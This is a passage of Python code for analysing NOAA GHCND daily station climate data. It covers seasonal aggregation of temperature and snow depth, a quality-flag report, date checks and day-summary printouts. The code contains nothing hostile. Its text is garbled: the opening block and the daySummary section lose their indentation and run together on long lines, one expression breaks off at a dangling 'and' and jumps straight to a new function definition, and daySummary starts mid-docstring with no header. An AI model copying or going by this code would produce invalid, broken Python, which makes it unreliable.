round(float(metclmt[y][m][d].snwd),1) == metclmt[y][s]["snwdPROP"]["day_max"][0]) #metclmt[y]["snwdPROP"]["month_max"][0] = round(max(sum(metclmt[y][m]["snwd"]) for m in metclmt[y] if type(m) == int),1) #for s in 
["spring","summer","fall","winter"]: #try: metclmt[y][s]["snwdPROP"]["month_max"][0] = round(max(sum(metclmt[y][m]["snwd"]) for m in metclmt[y] if type(m) == int and m in metclmt[y][s]["valid"]),2) #except: pass #print(y,s,m,[M for M in metclmt[y] if type(M) == int]) #metclmt[y]["snwdPROP"]["month_max"][1].extend(m for m in metclmt[y] if type(m) == int and round(sum(metclmt[y][m]["snwd"]),2) == metclmt[y]["snwdPROP"]["month_max"][0]) #for s in ["spring","summer","fall","winter"]: metclmt[y][s]["snwdPROP"]["month_max"][1].extend(m for m in metclmt[y] if type(m) == int and m in metclmt[y][s]["valid"] and round(sum(metclmt[y][m]["snwd"]),2) == metclmt[y][s]["snwdPROP"]["month_max"][0]) # TAVG metclmt[y]["tempAVGlist"] = [] for s in ["spring","summer","fall","winter"]: metclmt[y][s]["tempAVGlist"] = [] metclmt[y]["tempAVGlist"].extend(ta for m in metclmt[y].keys() if type(m) == int for ta in metclmt[y][m]["tempAVGlist"]) for s in ["spring","summer","fall","winter"]: metclmt[y][s]["tempAVGlist"].extend(ta for m in metclmt[y].keys() if type(m) == int and m in metclmt[y][s]["valid"] for ta in metclmt[y][m]["tempAVGlist"]) # TMAX metclmt[y]["tmax"] = [] for s in ["spring","summer","fall","winter"]: metclmt[y][s]["tmax"] = [] metclmt[y]["tmax"].extend(tx for m in metclmt[y].keys() if type(m) == int for tx in metclmt[y][m]["tmax"]) for s in ["spring","summer","fall","winter"]: metclmt[y][s]["tmax"].extend(tx for m in metclmt[y].keys() if type(m) == int and m in metclmt[y][s]["valid"] for tx in metclmt[y][m]["tmax"]) metclmt[y]["tmaxPROP"] = {"day_max":[-999,[]],"day_min":[999,[]],"month_AVG_max":[-999,[]],"month_AVG_min":[999,[]]} for s in ["spring","summer","fall","winter"]: metclmt[y][s]["tmaxPROP"] = {"day_max":[-999,[]],"day_min":[999,[]],"month_AVG_max":[-999,[]],"month_AVG_min":[999,[]]} if len(metclmt[y]["tmax"]) > 0: metclmt[y]["tmaxPROP"]["day_max"][0] = max(metclmt[y]["tmax"]) for s in ["spring","summer","fall","winter"]: try: 
metclmt[y][s]["tmaxPROP"]["day_max"][0] = max(metclmt[y][s]["tmax"]) except: pass #print(y,s,m,[M for M in metclmt[y] if type(M) == int]) metclmt[y]["tmaxPROP"]["day_max"][1].extend(metclmt[y][m][d] for m in metclmt[y] if type(m) == int for d in metclmt[y][m] if type(d) == int and metclmt[y][m][d].tmaxQ in ignoreflags and metclmt[y][m][d].tmax not in ["","-9999","9999"] and int(metclmt[y][m][d].tmax) == metclmt[y]["tmaxPROP"]["day_max"][0]) for s in ["spring","summer","fall","winter"]: metclmt[y][s]["tmaxPROP"]["day_max"][1].extend(metclmt[y][m][d] for m in metclmt[y] if type(m) == int and m in metclmt[y][s]["valid"] for d in metclmt[y][m] if type(d) == int and metclmt[y][m][d].tmaxQ in ignoreflags and metclmt[y][m][d].tmax not in ["","-9999","9999"] and int(metclmt[y][m][d].tmax) == metclmt[y][s]["tmaxPROP"]["day_max"][0]) metclmt[y]["tmaxPROP"]["day_min"][0] = min(metclmt[y]["tmax"]) for s in ["spring","summer","fall","winter"]: try: metclmt[y][s]["tmaxPROP"]["day_min"][0] = min(metclmt[y][s]["tmax"]) except: pass #print(y,s,m,[M for M in metclmt[y] if type(M) == int]) metclmt[y]["tmaxPROP"]["day_min"][1].extend(metclmt[y][m][d] for m in metclmt[y] if type(m) == int for d in metclmt[y][m] if type(d) == int and metclmt[y][m][d].tmaxQ in ignoreflags and metclmt[y][m][d].tmax not in ["","-9999","9999"] and int(metclmt[y][m][d].tmax) == metclmt[y]["tmaxPROP"]["day_min"][0]) for s in ["spring","summer","fall","winter"]: metclmt[y][s]["tmaxPROP"]["day_min"][1].extend(metclmt[y][m][d] for m in metclmt[y] if type(m) == int and m in metclmt[y][s]["valid"] for d in metclmt[y][m] if type(d) == int and metclmt[y][m][d].tmaxQ in ignoreflags and metclmt[y][m][d].tmax not in ["","-9999","9999"] and int(metclmt[y][m][d].tmax) == metclmt[y][s]["tmaxPROP"]["day_min"][0]) if any(len(metclmt[y][M]["tmax"]) > excludemonth for M in metclmt[y] if type(M) == int): metclmt[y]["tmaxPROP"]["month_AVG_max"][0] = round(max(mean(metclmt[y][m]["tmax"]) for m in metclmt[y] if type(m) == int and 
len(metclmt[y][m]["tmax"]) > excludemonth),1) metclmt[y]["tmaxPROP"]["month_AVG_max"][1].extend(m for m in metclmt[y] if type(m) == int and len(metclmt[y][m]["tmax"]) > excludemonth and round(mean(metclmt[y][m]["tmax"]),1) == metclmt[y]["tmaxPROP"]["month_AVG_max"][0]) for s in ["spring","summer","fall","winter"]: metclmt[y][s]["tmaxPROP"]["month_AVG_max"][1].extend(m for m in metclmt[y] if type(m) == int and m in metclmt[y][s]["valid"] and len(metclmt[y][m]["tmax"]) > excludemonth and round(mean(metclmt[y][m]["tmax"]),1) == metclmt[y][s]["tmaxPROP"]["month_AVG_max"][0]) metclmt[y]["tmaxPROP"]["month_AVG_min"][0] = round(min(mean(metclmt[y][m]["tmax"]) for m in metclmt[y] if type(m) == int and len(metclmt[y][m]["tmax"]) > excludemonth),1) metclmt[y]["tmaxPROP"]["month_AVG_min"][1].extend(m for m in metclmt[y] if type(m) == int and len(metclmt[y][m]["tmax"]) > excludemonth and round(mean(metclmt[y][m]["tmax"]),1) == metclmt[y]["tmaxPROP"]["month_AVG_min"][0]) for s in ["spring","summer","fall","winter"]: metclmt[y][s]["tmaxPROP"]["month_AVG_min"][1].extend(m for m in metclmt[y] if type(m) == int and m in metclmt[y][s]["valid"] and len(metclmt[y][m]["tmax"]) > excludemonth and round(mean(metclmt[y][m]["tmax"]),1) == metclmt[y][s]["tmaxPROP"]["month_AVG_min"][0]) for s in ["spring","summer","fall","winter"]: try:metclmt[y][s]["tmaxPROP"]["month_AVG_max"][0] = round(max(mean(metclmt[y][m]["tmax"]) for m in metclmt[y] if type(m) == int and m in metclmt[y][s]["valid"] and len(metclmt[y][m]["tmax"]) > excludemonth),1) except: pass #print(y,s,m,[M for M in metclmt[y] if type(M) == int]) for s in ["spring","summer","fall","winter"]: try: metclmt[y][s]["tmaxPROP"]["month_AVG_min"][0] = round(min(mean(metclmt[y][m]["tmax"]) for m in metclmt[y] if type(m) == int and m in metclmt[y][s]["valid"] and len(metclmt[y][m]["tmax"]) > excludemonth),1) except: pass #print(y,s,m,[M for M in metclmt[y] if type(M) == int]) # TMIN metclmt[y]["tmin"] = [] for s in 
["spring","summer","fall","winter"]: metclmt[y][s]["tmin"] = [] metclmt[y]["tmin"].extend(tx for m in metclmt[y].keys() if type(m) == int for tx in metclmt[y][m]["tmin"]) for s in ["spring","summer","fall","winter"]: metclmt[y][s]["tmin"].extend(tx for m in metclmt[y].keys() if type(m) == int and m in metclmt[y][s]["valid"] for tx in metclmt[y][m]["tmin"]) metclmt[y]["tminPROP"] = {"day_max":[-999,[]],"day_min":[999,[]],"month_AVG_max":[-999,[]],"month_AVG_min":[999,[]]} for s in ["spring","summer","fall","winter"]: metclmt[y][s]["tminPROP"] = {"day_max":[-999,[]],"day_min":[999,[]],"month_AVG_max":[-999,[]],"month_AVG_min":[999,[]]} if len(metclmt[y]["tmin"]) > 0: metclmt[y]["tminPROP"]["day_max"][0] = max(metclmt[y]["tmin"]) for s in ["spring","summer","fall","winter"]: try: metclmt[y][s]["tminPROP"]["day_max"][0] = max(metclmt[y][s]["tmin"]) except: pass #print(y,s,m,[M for M in metclmt[y] if type(M) == int]) metclmt[y]["tminPROP"]["day_max"][1].extend(metclmt[y][m][d] for m in metclmt[y] if type(m) == int for d in metclmt[y][m] if type(d) == int and metclmt[y][m][d].tminQ in ignoreflags and metclmt[y][m][d].tmin not in ["","-9999","9999"] and int(metclmt[y][m][d].tmin) == metclmt[y]["tminPROP"]["day_max"][0]) for s in ["spring","summer","fall","winter"]: metclmt[y][s]["tminPROP"]["day_max"][1].extend(metclmt[y][m][d] for m in metclmt[y] if type(m) == int and m in metclmt[y][s]["valid"] for d in metclmt[y][m] if type(d) == int and metclmt[y][m][d].tminQ in ignoreflags and metclmt[y][m][d].tmin not in ["","-9999","9999"] and int(metclmt[y][m][d].tmin) == metclmt[y][s]["tminPROP"]["day_max"][0]) metclmt[y]["tminPROP"]["day_min"][0] = min(metclmt[y]["tmin"]) for s in ["spring","summer","fall","winter"]: try: metclmt[y][s]["tminPROP"]["day_min"][0] = min(metclmt[y][s]["tmin"]) except: pass #print(y,s,m,[M for M in metclmt[y] if type(M) == int]) metclmt[y]["tminPROP"]["day_min"][1].extend(metclmt[y][m][d] for m in metclmt[y] if type(m) == int for d in metclmt[y][m] 
if type(d) == int and metclmt[y][m][d].tminQ in ignoreflags and metclmt[y][m][d].tmin not in ["","-9999","9999"] and int(metclmt[y][m][d].tmin) == metclmt[y]["tminPROP"]["day_min"][0]) for s in ["spring","summer","fall","winter"]: metclmt[y][s]["tminPROP"]["day_min"][1].extend(metclmt[y][m][d] for m in metclmt[y] if type(m) == int and m in metclmt[y][s]["valid"] for d in metclmt[y][m] if type(d) == int and metclmt[y][m][d].tminQ in ignoreflags and metclmt[y][m][d].tmin not in ["","-9999","9999"] and int(metclmt[y][m][d].tmin) == metclmt[y][s]["tminPROP"]["day_min"][0]) if any(len(metclmt[y][M]["tmin"]) > excludemonth for M in metclmt[y] if type(M) == int): metclmt[y]["tminPROP"]["month_AVG_max"][0] = round(max(mean(metclmt[y][m]["tmin"]) for m in metclmt[y] if type(m) == int and len(metclmt[y][m]["tmin"]) > excludemonth),1) metclmt[y]["tminPROP"]["month_AVG_max"][1].extend(m for m in metclmt[y] if type(m) == int and len(metclmt[y][m]["tmin"]) > excludemonth and round(mean(metclmt[y][m]["tmin"]),1) == metclmt[y]["tminPROP"]["month_AVG_max"][0]) for s in ["spring","summer","fall","winter"]: metclmt[y][s]["tminPROP"]["month_AVG_max"][1].extend(m for m in metclmt[y] if type(m) == int and m in metclmt[y][s]["valid"] and len(metclmt[y][m]["tmin"]) > excludemonth and round(mean(metclmt[y][m]["tmin"]),1) == metclmt[y][s]["tminPROP"]["month_AVG_max"][0]) metclmt[y]["tminPROP"]["month_AVG_min"][0] = round(min(mean(metclmt[y][m]["tmin"]) for m in metclmt[y] if type(m) == int and len(metclmt[y][m]["tmin"]) > excludemonth),1) metclmt[y]["tminPROP"]["month_AVG_min"][1].extend(m for m in metclmt[y] if type(m) == int and len(metclmt[y][m]["tmin"]) > excludemonth and round(mean(metclmt[y][m]["tmin"]),1) == metclmt[y]["tminPROP"]["month_AVG_min"][0]) for s in ["spring","summer","fall","winter"]: metclmt[y][s]["tminPROP"]["month_AVG_min"][1].extend(m for m in metclmt[y] if type(m) == int and m in metclmt[y][s]["valid"] and len(metclmt[y][m]["tmin"]) > excludemonth and 
def attchk(attstr):
    """Split a GHCND attribute string into its four flag characters.

    Not used by the user; the program uses it for output and 'filling in'
    of missing data.

    attchk(attstr) -> (M, Q, S, T) tuple, where each element is the
    character at that position of ``attstr`` or "" when the string is too
    short (or not indexable):
      M - Measurement Flag
      Q - Quality Flag
      S - Source Flag
      T - Time of Observation
    """
    flags = []
    for idx in range(4):
        # Narrowed from four copy-pasted bare try/excepts: a short string
        # raises IndexError; a non-indexable value raises TypeError/KeyError.
        try:
            flags.append(attstr[idx])
        except (IndexError, TypeError, KeyError):
            flags.append("")
    return tuple(flags)
def errorStats():
    """Print a report on records that might be worth verifying the data for.

    errorStats() -> printed report on possible-to-likely errors in the
    record; no arguments passed, nothing returned.

    Scans the module-level ``clmt`` structure built by clmtAnalyze():
    tallies days carrying a quality flag per element, days where TMIN
    exceeds TMAX, and days reporting snowfall with zero (non-trace)
    precipitation.
    """
    if len(clmt) == 0:
        return print("* OOPS! Run the clmtAnalyze function first.")
    total_records = 0
    errors = []        # days with at least one non-empty quality flag
    prcp_errors = []
    snow_errors = []
    snwd_errors = []
    tmax_errors = []
    tmin_errors = []
    error_array = [prcp_errors, snow_errors, snwd_errors, tmax_errors, tmin_errors]
    misscounter = 0    # days where tmax and/or tmin is missing / non-numeric
    tmax_lt_tmin = []
    snow_gt_0prcp = []
    for y in [year for year in clmt if type(year) == int]:
        for m in [month for month in clmt[y] if type(month) == int]:
            for d in [day for day in clmt[y][m] if type(day) == int]:
                total_records += 1
                rec = clmt[y][m][d]
                if any(e != "" for e in [rec.prcpQ, rec.snowQ, rec.snwdQ, rec.tmaxQ, rec.tminQ]):
                    errors.append(rec)
                if rec.prcpQ != "": prcp_errors.append(rec)
                if rec.snowQ != "": snow_errors.append(rec)
                if rec.snwdQ != "": snwd_errors.append(rec)
                if rec.tmaxQ != "": tmax_errors.append(rec)
                if rec.tminQ != "": tmin_errors.append(rec)
                try:
                    if int(rec.tmax) < int(rec.tmin):
                        tmax_lt_tmin.append("Day: {}; TMAX: {}; TMIN: {}".format(rec.daystr, rec.tmax, rec.tmin))
                except (ValueError, TypeError):   # narrowed from bare except
                    misscounter += 1
                try:
                    if float(rec.snow) > 0 and float(rec.prcp) == 0 and rec.prcpM != "T":
                        snow_gt_0prcp.append("Day: {}; PRCP: {} - {} :: SNOW: {} - {}".format(
                            rec.daystr,
                            rec.prcp, rec.prcpQ if rec.prcpQ != "" else " ",
                            rec.snow, rec.snowQ if rec.snowQ != "" else " "))
                except (ValueError, TypeError):   # narrowed from bare except
                    continue
    # Guard against an empty record set (original divided unconditionally).
    pct = round(len(errors) / total_records * 100, 2) if total_records else 0.0
    print("Total Dates with at least 1 Quality Flag: {}; % of Total Days: {}%".format(len(errors), pct))
    non_I_flags = [i for i in ignoreflags if i != "I"]   # hoisted out of the loops
    headers = ["PRCP ERRORS:", "SNOW ERRORS:", "SNWD ERRORS:", "TMAX ERRORS (Non-I):", "TMIN ERRORS (Non-I):"]
    for x in range(len(error_array)):
        print(headers[x])
        for rec in error_array[x]:
            if x == 0 and (rec.prcpQ not in non_I_flags or rec.prcp in ["9999", "-9999"]):
                print("Day: {}; PRCP: {}; Quality Flag (prcpQ): {} - {}".format(rec.daystr, rec.prcp, rec.prcpQ, qflagCheck(rec.prcpQ)))
            if x == 1 and (rec.snowQ not in non_I_flags or rec.snow in ["9999", "-9999"]):
                print("Day: {}; SNOW: {}; Quality Flag (snowQ): {} - {}".format(rec.daystr, rec.snow, rec.snowQ, qflagCheck(rec.snowQ)))
            if x == 2 and (rec.snwdQ not in ignoreflags or rec.snwd in ["9999", "-9999"]):
                print("Day: {}; SNWD: {}; Quality Flag (snwdQ): {} - {}".format(rec.daystr, rec.snwd, rec.snwdQ, qflagCheck(rec.snwdQ)))
            if x == 3 and ((rec.tmaxQ not in ignoreflags and rec.tmaxQ != "I") or rec.tmax in ["9999", "-9999"]):
                print("Day: {}; TMAX: {}; Quality Flag (tmaxQ): {} - {}".format(rec.daystr, rec.tmax, rec.tmaxQ, qflagCheck(rec.tmaxQ)))
            # BUG FIX: original checked rec.tmax for the 9999 sentinel here.
            if x == 4 and ((rec.tminQ not in ignoreflags and rec.tminQ != "I") or rec.tmin in ["9999", "-9999"]):
                print("Day: {}; TMIN: {}; Quality Flag (tminQ): {} - {}".format(rec.daystr, rec.tmin, rec.tminQ, qflagCheck(rec.tminQ)))
    print("---------------------------")
    print("TOTAL DAYS where tmax and/or tmin is missing: {}".format(misscounter))
    if len(tmax_lt_tmin) > 0:
        print("DAYS WHERE TMIN > TMAX:")
        for line in tmax_lt_tmin:
            print(line)
    if len(snow_gt_0prcp) > 0:
        print("----------------------------")
        print("DAYS WHERE PRCP == 0 (with no trace recorded) and SNOW > 0:")
        for line in snow_gt_0prcp:
            print(line)
    print("")
def checkDate(*args):
    """Validate that a year / year-month / year-month-day exists in clmt.

    Used only by the program.  Returns True when the entry is present;
    prints a hint and returns False (or None when no date was given)
    otherwise.
    """
    if len(args) == 3:
        y, m, d = args
        try:
            if clmt[y][m][d]:
                return True
        except KeyError:
            print("OOPS! An entry for {}-{}-{} was not found. Try again.".format(
                str(y).zfill(4), str(m).zfill(2)[0:2], str(d).zfill(2)[0:2]))
            # A day/month larger than the year usually means swapped arguments.
            if d > y or m > y:
                print("*** Ensure your entry matches the format of dayStats(year,month,day) ***")
        return False
    elif len(args) == 2:
        y, m = args
        try:
            if clmt[y][m]:
                return True
        except KeyError:
            try:
                print("OOPS! An entry for {} {} was not found. Try again.".format(calendar.month_name[m], y))
                if m > y:
                    print("*** Ensure your entry matches the format of monthStats(year,month) ***")
            except Exception:
                # month index was itself invalid (e.g. out of range / wrong type)
                print("OOPS! A likely invalid month entry. Ensure format of monthStats(year,month). Try again.")
        return False
    elif len(args) == 1:
        y = args[0]
        try:
            if clmt[y]:
                return True
        except KeyError:
            print("OOPS! An entry for {} was not found. Try again.".format(y))
        return False
    else:
        print("OOPS! No date input received! Try again!")
def checkDate2(*args):
    """Silently check that a (year, month, day) entry exists in clmt.

    Used only by the program in functions that check but don't return a
    true/false message (no error text is printed).
    """
    y = args[0]
    m = args[1]
    d = args[2]
    try:
        if clmt[y][m][d]:
            return True
    except KeyError:
        return False

def rank(n):
    """Return n with its English ordinal suffix ("1st", "2nd", "23rd", "111th").

    Non-int input (including bool) or n <= 0 yields "".

    BUG FIX: the original evaluated ``n <= 0`` before the type check, so a
    non-numeric argument (e.g. a str) raised TypeError on Python 3; the type
    check now comes first.
    """
    if type(n) is not int or n <= 0:
        return ""
    if 11 <= n % 100 <= 13:
        # the "teens" (…11, …12, …13) always take "th"
        return str(n) + "th"
    return str(n) + {1: "st", 2: "nd", 3: "rd"}.get(n % 10, "th")
def qflagCheck(*q):
    """Look up the meaning of a Quality Flag.

    Primarily used internally by the program.  Quality Flags are used to
    denote data that may not be reliable.

    qflagCheck(*[str]) -> str

    OPTIONAL args: a one-letter flag string (e.g. "F") -> returns the
    definition of that flag.  With no argument, the full flag table is
    printed instead.
    """
    definitions = {
        "D": "Failed (D)uplicate Check",
        "G": "Failed (G)ap Check",
        "I": "Failed (I)nternal Consistency Check",
        "K": "Failed Strea(K)/Frequent-Value Check",
        "L": "Failed Check on (L)ength of Multi-day period",
        "M": "Failed (M)ega-Consistency Check",
        "N": "Failed (N)aught Check",
        "O": "Failed Climatological (O)utlier Check",
        "R": "Failed Lagged (R)ange Check",
        "S": "Failed (S)patial Consistency Check",
        "T": "Failed (T)emporal Consistency Check",
        "W": "Temperature Too (W)arm for Snow",
        "X": "Failed Bounds Check",
        "Z": "Flagged as a result of an official Datzilla Investigation",
    }
    if len(q) != 0:
        return definitions.get(q[0], "None/Not-Documented")
    # No argument: print the whole table (dict preserves the listing order).
    for letter, meaning in definitions.items():
        print("{} - {}".format(letter, meaning))
daySummary(y1,m1,d1,*[y2,m2,d2]) EXAMPLE: daySummary(2016,10,1,2016,10,31) -> Lists daily summaries for dates between 1 OCT 2016 and 31 OCT 2016 EXAMPLE: daySummary(1980,11,1) -> Lists daily summaries for dates between 1 NOV 1980 and 31 DEC 1980 """ if any(type(x) != int for x in [y1,m1,d1]): return print("*** OOPS! Error in Date #1. Ensure that only integers are entered ***") #valid1 = checkDate(y1,m1,d1) if len(date2) == 0: if y1 == max(Y for Y in clmt if type(Y) == int): y2 = y1 m2 = max(M for M in clmt[y2] if type(M) == int) d2 = max(D for D in clmt[y2][m2] if type(D) == int) else: y2 = y1; m2 = 12; d2 = 31 elif len(date2) != 3: return print("*** OOPS! For the 2nd (optional) date, ensure a Year, Month and Date are entered ***") else: if any(type(x) != int for x in [date2[0],date2[1],date2[2]]): return print("*** OOPS! Error in Date #2. Ensure that only integers are entered ***") #valid2 = checkDate(date2[0],date2[1],date2[2]) y2 = date2[0]; m2 = date2[1]; d2 = date2[2] # Further inspection of Day 1 if y1 not in clmt: return print("OOPS! Regarding Date #1, no yearly-data found for {}. The earliest year is {}.".format(y1,min(Y for Y in clmt if type(Y) == int))) if m1 not in range(1,12+1): return print("OOPS! Regarding Date #1, ensure the month is in the range [1,12]. Try again!") daysinmonth = max(D for Y in clmt if type(Y) == int and m1 in clmt[Y] for D in clmt[Y][m1] if type(D) == int) if d1 not in range(1,daysinmonth+1): return print("OOPS! Regarding Date #1, ensure the day is in the range [1,{}]. Try again!".format(daysinmonth)) if m1 == 2 and d1 == 29 and calendar.isleap(y1) == False: print("OOPS! Date #1 does not occur. It's not during a leap year. Try again!") # Furthur inspection of Day 2 if y2 not in clmt: return print("OOPS! Regarding Date #2, no yearly-data found for {}. The earliest year is {}.".format(y2,min(Y for Y in clmt if type(Y) == int))) if m2 not in range(1,12+1): return print("OOPS! Regarding Date #2, ensure the month is in the range [1,12]. 
Try again!") daysinmonth = max(D for Y in clmt if type(Y) == int and m2 in clmt[Y] for D in clmt[Y][m2] if type(D) == int) if d2 not in range(1,daysinmonth+1): return print("OOPS! Regarding Date #2, ensure the day is in the range [1,{}]. Try again!".format(daysinmonth)) if m2 == 2 and d2 == 29 and calendar.isleap(y2) == False: print("OOPS! Date #2 does not occur. It's not during a leap year. Try again!") startday = datetime.date(y1,m1,d1) endday = datetime.date(y2,m2,d2) if startday == endday: return print("OOPS! Start and End dates are the exact same; please ensure otherwise! Try again!") if endday < startday: return print("OOPS! End date is sooner than the start date. Try again!") incrday = startday print("") print("{:^88}".format("Day Summaries from {} {} {} to {} {} {}".format(str(d1).zfill(2),calendar.month_abbr[m1].upper(),y1,str(d2).zfill(2),calendar.month_abbr[m2].upper(),y2))) print("{:^88}".format("{}: {}".format(clmt["station"],clmt["station_name"]))) print("{:^88}".format("{:-^45}".format(""))) while incrday <= endday: # { try: print(" {}: PRCP: {:>5}{:3}; SNOW: {:>4}{:3}; SNWD: {:>4}{:3}; TMAX: {:>3}{:3}; TMIN: {:>3}{:3};".format( clmt[incrday.year][incrday.month][incrday.day].daystr, "{:>5.2f}".format(float(clmt[incrday.year][incrday.month][incrday.day].prcp)) if clmt[incrday.year][incrday.month][incrday.day].prcp != "" else "", "{} {}".format( clmt[incrday.year][incrday.month][incrday.day].prcpM if clmt[incrday.year][incrday.month][incrday.day].prcpM == "T" else "", clmt[incrday.year][incrday.month][incrday.day].prcpQ if clmt[incrday.year][incrday.month][incrday.day].prcpQ != "" else ""), "{:>4.1f}".format(float(clmt[incrday.year][incrday.month][incrday.day].snow)) if (clmt[incrday.year][incrday.month][incrday.day].snow != "" and float(clmt[incrday.year][incrday.month][incrday.day].snow) != 0) or (clmt[incrday.year][incrday.month][incrday.day].snow != "" and clmt[incrday.year][incrday.month][incrday.day].snowM == "T") else "----", "{} {} ".format( 
                clmt[incrday.year][incrday.month][incrday.day].snowM if clmt[incrday.year][incrday.month][incrday.day].snowM == "T" else "",
                clmt[incrday.year][incrday.month][incrday.day].snowQ if clmt[incrday.year][incrday.month][incrday.day].snowQ != "" else ""),
            "{:>4.1f}".format(float(clmt[incrday.year][incrday.month][incrday.day].snwd)) if (clmt[incrday.year][incrday.month][incrday.day].snwd != "" and float(clmt[incrday.year][incrday.month][incrday.day].snwd) != 0) or (clmt[incrday.year][incrday.month][incrday.day].snwd != "" and clmt[incrday.year][incrday.month][incrday.day].snwdM == "T") else "----",
            "{} {} ".format(
                clmt[incrday.year][incrday.month][incrday.day].snwdM if clmt[incrday.year][incrday.month][incrday.day].snwdM == "T" else "",
                clmt[incrday.year][incrday.month][incrday.day].snwdQ if clmt[incrday.year][incrday.month][incrday.day].snwdQ != "" else ""),
            clmt[incrday.year][incrday.month][incrday.day].tmax,
            " {} ".format(clmt[incrday.year][incrday.month][incrday.day].tmaxQ) if clmt[incrday.year][incrday.month][incrday.day].tmaxQ != "" else "",
            clmt[incrday.year][incrday.month][incrday.day].tmin,
            " {} ".format(clmt[incrday.year][incrday.month][incrday.day].tminQ) if clmt[incrday.year][incrday.month][incrday.day].tminQ != "" else ""
            ))
        # Bare except: any date absent from clmt (or a malformed entry) falls
        # through to the "no data" line instead of aborting the listing.
        except: print(" *** NO ENTRY DATA FOUND FOR {}-{}-{} ***".format(incrday.year,incrday.month,incrday.day))
        incrday += datetime.timedelta(days=1)
    print("")

def dayStats(y: int, m: int, d: int) -> None:
    """Print recorded statistics for a single day of interest.

    Looks the date up in the module-level ``clmt`` dict (populated by
    clmtAnalyze) and prints PRCP/SNOW/SNWD/TAVG/TMAX/TMIN values for that
    day, each with its all-time rank among every year on record for the
    same calendar day (same month/day).  Passed arguments MUST be integers.

    dayStats(year,month,day)
    EXAMPLE: dayStats(1992,12,29) -> Returns a printout of statistics from
    December 29, 1992
    """
    # NOTE(review): `ranks` is never read in this function; the rank()
    # helper presumably supplies ordinal suffixes itself -- confirm and drop.
    ranks = ["th","st","nd","rd","th","th","th","th","th","th"]
    # clmt is filled by clmtAnalyze(); nothing to report before that runs.
    if len(clmt) == 0: return print("* OOPS! Run the clmtAnalyze function first.")
    # checkDate is assumed to validate y/m/d and print its own error on
    # failure -- TODO confirm (this function stays silent when it returns falsy).
    dayExists = checkDate(y,m,d)
    if dayExists:
        print("")
        dayobj = clmt[y][m][d]
        # All-time ranking lists for this calendar day (month m, day d) across
        # every integer year key in clmt.  set() de-duplicates, so tied values
        # share a single rank position.  prcp/snow/snwd histories exclude zero
        # values and keep only quality flags listed in ignoreflags; tmax/tmin
        # histories keep only records whose quality flag is empty.
        prcphist = sorted(list(set(list(round(float(clmt[Y][m][d].prcp),2) for Y in clmt if type(Y) == int and m in clmt[Y] and d in clmt[Y][m] and clmt[Y][m][d].prcp != "" and float(clmt[Y][m][d].prcp) != 0 and clmt[Y][m][d].prcpQ in ignoreflags))),reverse=True)
        snowhist = sorted(list(set(list(round(float(clmt[Y][m][d].snow),1) for Y in clmt if type(Y) == int and m in clmt[Y] and d in clmt[Y][m] and clmt[Y][m][d].snow != "" and float(clmt[Y][m][d].snow) != 0 and clmt[Y][m][d].snowQ in ignoreflags))),reverse=True)
        snwdhist = sorted(list(set(list(round(float(clmt[Y][m][d].snwd),1) for Y in clmt if type(Y) == int and m in clmt[Y] and d in clmt[Y][m] and clmt[Y][m][d].snwd != "" and float(clmt[Y][m][d].snwd) != 0 and clmt[Y][m][d].snwdQ in ignoreflags))),reverse=True)
        # "desc" lists rank warmest-first, "asc" lists coolest-first; a value's
        # position in each determines whether it prints as Warmest or Coolest.
        tmaxdeschist = sorted(list(set(list(int(clmt[Y][m][d].tmax) for Y in clmt if type(Y) == int and m in clmt[Y] and d in clmt[Y][m] and clmt[Y][m][d].tmax != "" and clmt[Y][m][d].tmaxQ == ""))),reverse=True)
        tmaxaschist = sorted(list(set(list(int(clmt[Y][m][d].tmax) for Y in clmt if type(Y) == int and m in clmt[Y] and d in clmt[Y][m] and clmt[Y][m][d].tmax != "" and clmt[Y][m][d].tmaxQ == ""))))
        tmindeschist = sorted(list(set(list(int(clmt[Y][m][d].tmin) for Y in clmt if type(Y) == int and m in clmt[Y] and d in clmt[Y][m] and clmt[Y][m][d].tmin != "" and clmt[Y][m][d].tminQ == ""))),reverse=True)
        tminaschist = sorted(list(set(list(int(clmt[Y][m][d].tmin) for Y in clmt if type(Y) == int and m in clmt[Y] and d in clmt[Y][m] and clmt[Y][m][d].tmin != "" and clmt[Y][m][d].tminQ == ""))))
        # TAVG history comes from the precomputed clmt_vars_days table rather
        # than being rebuilt from clmt like the lists above.
        #clmt_vars_days = {"prcp":{},"snow":{},"snwd":{},"tavg":{},"tmax":{},"tmin":{}}
        tavgdeschist = sorted(list(set(list(V for V in clmt_vars_days["tavg"] for D in clmt_vars_days["tavg"][V] if D.month == m and D.day == d))),reverse=True)
        tavgaschist = sorted(list(set(list(V for V in clmt_vars_days["tavg"] for D in clmt_vars_days["tavg"][V] if D.month == m and D.day == d))))
        #sorted(list(set(list(round(float(clmt[Y][m][d].prcp),2) for Y in clmt if type(Y) == int and m in clmt[Y] and d in clmt[Y][m] and clmt[Y][m][d].prcp != "" and float(clmt[Y][m][d].prcp) != 0 and clmt[Y][m][d].prcpQ == ""))),reverse=True)
        print("Statistics for {}".format(dayobj.entryday))
        print("Report Location: {}, {}".format(dayobj.stationid,dayobj.station_name))
        print("-------------------")
        # PRCP line: value ("T" when the measurement flag marks a trace),
        # optional quality flag, optional all-time rank.
        # NOTE(review): unlike SNOW/SNWD below, the rank arm does not check
        # prcpQ; a non-ignored flag means the value is absent from prcphist and
        # .index() would raise ValueError -- confirm intended.
        print("PRCP: {}{}{}".format("T" if dayobj.prcpM == "T" else dayobj.prcp,
            ", Flag: {} - {}".format(dayobj.prcpQ,qflagCheck(dayobj.prcpQ)) if dayobj.prcpQ != "" else "",
            # rank(tavgaschist.index(round(mean(clmt[y][m]["tempAVGlist"]),1))+1)
            ", Rank: {}".format(rank(prcphist.index(round(float(dayobj.prcp),2))+1)) if dayobj.prcp != "" and float(dayobj.prcp) != 0 else ""))
        # SNOW prints only when snowfall was positive or a trace was flagged;
        # note the `and` binds tighter than `or` here, so a trace with an empty
        # snow value still enters this branch.
        if dayobj.snow != "" and float(dayobj.snow) > 0 or dayobj.snowM == "T":
            print("SNOW: {}{}{}".format("T" if dayobj.snowM == "T" else dayobj.snow,
                ", Flag: {} - {}".format(dayobj.snowQ,qflagCheck(dayobj.snowQ)) if dayobj.snowQ != "" else "",
                ", Rank: {}".format(rank(snowhist.index(round(float(dayobj.snow),1))+1)) if dayobj.snowQ in ignoreflags else ""))
        # SNWD prints only when a positive snow depth was recorded.
        if dayobj.snwd != "" and float(dayobj.snwd) > 0:
            print("SNWD: {}{}{}".format("T" if dayobj.snwdM == "T" else dayobj.snwd,
